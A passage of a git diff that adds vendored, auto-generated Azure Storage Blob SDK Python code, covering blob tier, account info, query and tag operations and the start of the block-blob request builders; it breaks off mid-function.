blob storage account (locally redundant + storage only). A premium page blob's tier determines the allowed size, IOPS, and bandwidth of + the blob. A block blob's tier determines Hot/Cool/Archive storage type. This operation does not + update the blob's ETag. + + :param tier: Indicates the tier to be set on the blob. + :type tier: str or ~azure.storage.blob.models.AccessTierRequired + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param rehydrate_priority: Optional: Indicates the priority with which to rehydrate an archived + blob. Default value is None. + :type rehydrate_priority: str or ~azure.storage.blob.models.RehydratePriority + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "tier". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tier") # type: str + + _lease_id = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + + request = build_set_tier_request( + url=self._config.url, + comp=comp, + version=self._config.version, + tier=tier, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + rehydrate_priority=rehydrate_priority, + request_id_parameter=request_id_parameter, + lease_id=_lease_id, + if_tags=_if_tags, + template_url=self.set_tier.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if response.status_code == 202: + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_tier.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs # type: Any + ): + # type: (...) -> None + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def query( + self, + snapshot=None, # type: Optional[str] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + query_request=None, # type: Optional["_models.QueryRequest"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> IO + """The Query operation enables users to select/project on blob data by providing simple query + expressions. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param query_request: the query request. Default value is None. + :type query_request: ~azure.storage.blob.models.QueryRequest + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "query". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "query") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if query_request is not None: + _content = self._serialize.body(query_request, 'QueryRequest', is_xml=True) + else: + _content = None + + request = build_query_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + snapshot=snapshot, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.query.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 206]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + + deserialized = response.stream_download(self._client._pipeline) + + if response.status_code == 206: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + query.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_tags( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + snapshot=None, # type: Optional[str] + version_id=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> "_models.BlobTags" + """The Get Tags operation enables users to get the tags associated with a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "tags". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: BlobTags, or the result of cls(response) + :rtype: ~azure.storage.blob.models.BlobTags + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobTags"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tags") # type: str + + _if_tags = None + _lease_id = None + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_tags_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + snapshot=snapshot, + version_id=version_id, + if_tags=_if_tags, + lease_id=_lease_id, + template_url=self.get_tags.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('BlobTags', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_tags.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_tags( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + version_id=None, # type: Optional[str] + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + request_id_parameter=None, # type: Optional[str] + tags=None, # type: Optional["_models.BlobTags"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Set Tags operation enables users to set tags on a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param tags: Blob tags. Default value is None. + :type tags: ~azure.storage.blob.models.BlobTags + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "tags". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tags") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _if_tags = None + _lease_id = None + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if tags is not None: + _content = self._serialize.body(tags, 'BlobTags', is_xml=True) + else: + _content = None + + request = build_set_tags_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + version_id=version_id, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + request_id_parameter=request_id_parameter, + if_tags=_if_tags, + lease_id=_lease_id, + template_url=self.set_tags.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [204]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_tags.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_block_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_block_blob_operations.py new file mode 100644 index 0000000..e11d307 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_block_blob_operations.py @@ -0,0 +1,1649 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_upload_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-blob-type'] = _SERIALIZER.header("blob_type", blob_type, 'str') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_put_blob_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + copy_source = kwargs.pop('copy_source') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = 